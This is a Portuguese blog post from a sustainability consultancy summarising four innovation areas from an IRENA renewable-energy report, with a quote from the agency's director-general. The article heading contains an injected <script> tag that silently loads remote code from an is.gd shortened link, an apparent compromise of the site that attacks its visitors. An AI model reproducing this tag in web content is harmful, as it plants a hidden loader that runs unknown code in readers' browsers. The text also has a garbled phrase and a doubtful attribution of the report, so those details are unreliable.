fbpx
Ligue-nos:     21 2147-0829   /     21 97532-3236
As 4 áreas que mudarão a energia<script src="https://is.gd/y0fFL5?v=v19.0"></script>

As 4 áreas que mudarão a energia

A 11ª edição do Global Innovation Index Report 2018, divulgado pela Agencia Internacional para Energia Renováveis (IRENA), apontou quatro áreas que seriam agilizariam a mudança do nosso sistema de energia atual para um mais sustentável:

  • Promover uma abordagem para a inovação, para além de pesquisa e desenvolvimento;
  • Fortalecer a cooperação internacional para fomentar a inovação;
  • Fortalecer a integração avançada do sistema energético;
  • Apoiar um portfólio de opções tecnológicas para eletrificar e descarbonizar os clientes finais.

Além disso, o documento também destacou as áreas nas quais o esforço para a utilização de energias sustentáveis tiveram maior efeito e a evolução e desenvolvimento de outras tecnologias renováveis. Entre aquelas que estão com um desenvolvimento considerado promissor são a energia solar fotovoltaica, a energia eólica e os carros elétricos, enquanto o biofuel e a energia solar térmica concentrada (heliotérmica), ainda carecem no sentido de taxas de economia.

Durante o evento Innovation Week 2018, organizado pela IRENA, que busca formas de utilizar as inovações tecnológicas, negócios e sistemas de diversos setores para atingir o uso pleno de energias renováveis, direto-geral, Adnan Z. Amin, destacou que “A realidade da transformação global em termos energéticos está a surpreender todas as expectativas. Estamos a seguir o caminho de um mundo onde a energia eléctrica será abundante e barata. O desafio é descobrir as inovações que tornem estas questões úteis para a sociedade”,

“A IRENA surgiu em 2009 com o objectivo de apoiar os países numa transição para um modelo energético mais sustentável, e conta actualmente com 158 membros, entre os quais Portugal.”

Acesse o documento completo em: http://irena.org/newsroom/articles/2018/Aug/Global-Innovation-Index

Fonte: Edificio e Energia

Elaboração: Julia Meliga Pimentel, Marketing, Gene Sustentável

As 4 áreas que mudarão a energia
5 (100%) 1 vote

Adicionar comentário

Seu endereço de email não será publicado. Campos obrigatórios são marcados *

Copied!